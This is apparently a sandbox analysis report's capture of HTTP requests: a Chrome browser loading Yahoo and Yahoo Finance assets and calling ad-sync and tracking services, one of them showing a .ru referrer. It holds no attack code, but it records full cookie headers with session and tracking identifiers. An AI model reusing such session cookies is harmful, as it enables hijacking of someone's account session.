Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/Wzs19jFHdMDc_wAXtX4KnQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/7e34b8e0-7778-11ef-b5fd-d718d88a3d1b.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/AdGroup.BvlaXdca.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/irocQ7vdF0Cre0047_F2BA--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/1ab9b3e0-7f4a-11ef-9bc8-98e2d97b2d54.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/1exjVpdKZ.RKQhQMvgY39Q--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2023-09/e0cf9c30-5ee8-11ee-af7e-5e30c1880d05.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /p2?c1=2&c2=7241469&c5=2023538075&c7=https%3A%2F%2Fwww.yahoo.com%2F&c14=-1&c8=Yahoo%20%7C%20Mail%2C%20Weather%2C%20Search%2C%20Politics%2C%20News%2C%20Finance%2C%20Sports%20%26%20Videos&c9=https%3A%2F%2Fhfj.rontishet.ru%2F&gdpr=0&gdpr_consent=&cs_ucfr=1&cs_fpdm=*null&cs_fpdt=*null&cs_fpid=ktb74Qf%2BB5a5JQqJGS%2Fbp0PG1iIU%2BWKGDEPE8YdWnT4%3D&cs_fpit=c&ns_c=UTF-8&ns__t=1727716870229 HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=1DD20ed7f68597d26f3495f1727716881; XID=1DD20ed7f68597d26f3495f1727716881
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Header.BvCA0Mhu.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/159.DCpiEfEp.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/SectorNews.B3Fo2MG7.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /cx/pv/perf-vitals_3.3.0.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/ErrorMsg.CmzKsgiD.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /floorPrice/wnsrvBJmEPrTfrnFX/js/floorPrice/linreg.min.js HTTP/1.1Host: wnsrvbjmeprtfrnfx.ay.deliveryConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Dock.BKyC7edm.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fads.yieldmo.com%2Fv000%2Fsync%3Fextinit%3D0%26userid%3D%24UID%26pn_id%3Dan HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XANDR_PANID=RGs3E-BNKWUM9-E0Yk6nUq1ov1cuPZyw51dkSNWtWVZE2TtKD2t0w8nihOlT-IcCBZ6eN6XF0B7WUcdB-B2J9u_noxx1687OtyCpmDgTn8Y.; receive-cookie-deprecation=1; uuid2=7992184014990425658
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=yieldmo&zcc=1&cb=1727716882237 HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _rxuuid=%7B%22rx_uuid%22%3A%22RX-3fef85e6-bbf0-409a-a376-6c1ad497756a-003%22%2C%22zdxidn%22%3A%222069.28%22%7D
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=svx9t50&ttd_tpi=1&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cv/apiv2/weather-svg/MOSTLY_CLOUDY_DAY.svg HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&rn=1.7387329119779311 HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw
Source: global trafficHTTP traffic detected: GET /cv/apiv2/weather-svg/SHOWERS.svg HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2&rn=1.7387329119779311 HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; trc_cookie_storage=taboola%2520global%253Auser-id%3D27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw
Source: global trafficHTTP traffic detected: GET /cv/apiv2/yahoo_weather_web/accuweather-horizontal.png HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/EventCalendarPreview.CNE2v6iu.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
